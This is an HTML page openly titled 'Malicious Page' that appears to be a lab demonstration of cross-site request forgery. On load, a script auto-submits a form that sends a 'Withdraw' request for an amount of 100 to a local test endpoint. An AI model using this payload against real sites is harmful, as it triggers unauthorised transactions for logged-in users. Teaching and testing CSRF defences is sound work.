<!DOCTYPE html>
<!--
To change this license header, choose License Headers in Project Properties.
To change this template file, choose Tools | Templates
and open the template in the editor.
-->
<html>
    <head>
        <title>Malicious Page</title>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
    </head>
    <body>
        <h1>This is a Malicious Page</h1>
        
        <form action="http://localhost:8080/csrf/Withdraw" method="GET">
            <input type="text" name="amount" value="100">
        </form>
        
        <script type="text/javascript">
            document.forms[0].submit();
        </script>
    </body>
</html>
